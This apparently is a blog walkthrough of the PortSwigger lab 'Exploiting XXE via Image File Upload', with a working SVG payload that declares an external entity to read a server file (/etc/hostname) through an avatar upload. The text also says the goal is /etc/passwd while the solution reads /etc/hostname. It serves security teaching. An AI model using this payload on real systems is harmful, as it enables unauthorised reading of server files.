Exploiting XXE Via Image File Upload

Introduction

This is our 8th article on XML or XXE injection vulnerabilities. In this article, we will solve the PortSwigger Web Security lab “Exploiting XXE via Image File Upload.” If you haven’t checked the other parts, you can search for them on our website and read them.

Table of Contents

Lab Description Of Exploiting XXE Via Image File Upload

In this lab, users can post comments in the comments section along with attaching an avatar. The avatar is processed using the Apache Batik library.

To solve this lab, we need to display the content of the “/etc/passwd” file using an image. After accessing the file, you can submit it to complete the lab.

Lab Solution

First, you need to access the lab. Once you have access, you can view any post.

As you can see, we have the option to comment, and we can also attach an avatar. We will exploit this lab using the avatar feature.

First, we need to create an SVG file.

I have already created a file named “exploit.svg” on my system, which we will use to exploit this vulnerability.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Above is the code that you need to copy and save as “exploit.svg” on your system.

Basically, if you understand XML, you can read the code. Through this code, I am fetching the “file:///etc/hostname” from the LP server. Now it’s time to exploit this vulnerability using this code.

Now I am clicking on the “Post Comment” button to see what happens. I see a message on the screen that says “Thank you for your comment,” indicating that our comment has been posted. Now, let’s check the post and see how our comment appears. will click on “Back to Blog.”

You can see my comment at the end. So we have attached two screenshots side by side. I have right-clicked on my avatar and opened it in a new window. I found a secret name, which is “b10cde35944c.” It could be the hostname. Now we will submit our hostname that we found.

As you can see, we have successfully solved the PortSwigger Web Security lab “Exploiting XXE via Image File Upload.” Congratulations!

If you want to learn more about web security, you can explore our website and click on the “Web Security” section in the Cybersecurity menu. There you will find everything related to web security.

To continue studying check out the next lab i.e. Exploiting XXE To Retrieve Data By Repurposing A Local DTD, cover the current lab before visiting the next lab. Good Luck!